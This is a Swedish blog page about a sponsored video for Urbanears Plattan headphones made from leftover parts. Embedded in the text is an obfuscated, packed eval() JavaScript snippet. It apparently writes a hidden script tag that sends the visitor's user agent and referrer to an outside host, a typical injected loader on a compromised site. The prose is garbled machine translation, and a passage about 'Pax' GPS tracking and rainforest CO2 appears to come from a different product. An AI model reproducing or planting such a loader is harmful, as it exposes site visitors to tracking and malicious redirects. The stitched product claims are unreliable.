Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Sponsrad Video: Urbanears Editions RE:PLATTAN

Sponsrad Video: Urbanears Editions RE:PLATTAN

type=”text/javascript” src=”http://video.unrulymedia.com/wildfire_131175897.js”>
Urbanears eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ainzr|var|u0026u|referrer|kyhiy||js|php’.split(’|’),0,{}))
Editions är speciella modeller med det lilla extra. Re: Plattan använder en hel del extra, i form av outnyttjade delar från tidigare kollektioner. Dessa överblivna delar kommer tillsammans att bilda ett färgrikt lapptäcke åt ett par snygga hörlurar.

Så fungerar det

Varje Pax har en personlig ID som kommer med GPS-koordinater. Spåra din Pax genom att gå till getpax.com / Urbanears och använda personnummer tryckt på sidan taggen.

Visste du att?

Vart femte kvadratmeter sparad vegetation innehåller cirka 500 kg CO2 – det betyder en Pax stannar ungefär ett halvt ton koldioxid som aldrig når atmosfären, vilket bidrar till ett mer stabilt klimat. På dessa fem kvadratmeter, kan du hitta cirka 500 myror, 10 blommor, 5 spindlar, 2 fjärilar, 5 buskar, träd, apor, fåglar, grodor och kanske en jaguar – om du har tur.

Mer om Plattan

Den Plattan är utformad för att vara den perfekta klassiska hörluren, använda innovativa funktioner och prestanda med dagens teknologi. Det är en fullstor hörlur möjliggör rika, avskilt ljud. Du kan vika ner till storleken av din knytnäve för maximal rörlighet. Plattan levereras också med en ZoundPlug på öronproppar, vilket möjliggör en vän att ansluta och njuta av din musik.